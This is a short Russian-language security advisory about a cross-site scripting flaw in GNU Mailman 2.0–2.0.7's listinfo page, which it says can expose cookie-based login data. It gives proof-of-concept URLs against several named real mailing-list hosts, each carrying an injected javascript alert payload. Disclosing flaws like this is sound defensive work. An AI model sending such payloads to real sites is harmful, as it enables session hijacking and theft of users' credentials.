GNU Mailman - свободно распространяемый
менеджер рассылки, написанный на Python и C. 

Можно включить злонамеренный код в ссылку
на сайте, на котором выполняется Mailman. Когда
Web-пользователь нажимает злобную ссылку на
вашем сайте, код сценария будет выполнен в
контексте сайта Mailman. Эта уязвимость
позволяет собирать информацию о
пользователе или получать доступ к
опознавательной информации на основе cookie.

Пример:

http://www.dshield.org/mailman/listinfo/<img%20src=javascript:alert(document.domain)>;
http://mail.gnu.org/mailman/listinfo/<img%20src=javascript:alert(document.domain)>;
http://lists.bell-labs.com/mailman/listinfo/<img%20src=javascript:alert(document.domain)>;
http://mail.gnome.org/mailman/listinfo/<img%20src=javascript:alert(document.domain)>;
http://www.lists.apple.com/mailman/listinfo/<img%20src=javascript:alert(document.domain)>;

Уязвимость найдена в GNU Mailman 2.0-2.0.7

Более подробно об уязвимости данного типа
можно узнать здесь:
http://www.securitylab.ru/owasp/OWASP-IV-CSS-1.htm

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии